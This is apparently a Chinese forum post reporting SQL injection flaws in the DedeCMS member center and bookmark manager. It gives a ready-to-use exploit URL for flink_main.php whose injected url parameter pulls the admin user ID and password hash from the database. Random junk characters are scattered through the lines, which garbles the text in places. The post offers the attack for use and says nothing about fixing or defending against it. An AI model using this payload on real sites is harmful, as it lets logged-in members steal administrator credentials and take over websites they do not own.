DedeCMS会员中心SQL注射漏洞& w: M* Y% i: O' g. b$ u7 Q# Y
需要magic_quotes_gpc = Off
9 R; M' T2 b# z1 ?& M) g. u; j3 R x会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
3 N1 h7 P7 V8 n% p# o/ b# O; o 2 m. S F* @" _( q- `5 h2 k3 t4 B
DedeCMS会员中心书签管理SQL注射漏洞
, U/ A4 t9 ~/ @1 ^4 N: L成功利用该漏洞可获得管理员密码
! U/ D- l5 _+ g: o7 h) L
8 N3 n% x0 O$ { a0 i会员登录后可以执行SQL语句查询数据库任意内容如管理员密码6 [7 W# @/ f _1 ~
% Y% H8 m" v) `/ ]http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r6 ?; N& e0 N6 X$ n& Z0 ]
|
发表于 2012-12-31 09:21:18
收藏
支持
反对
发表于 2013-1-10 01:33:59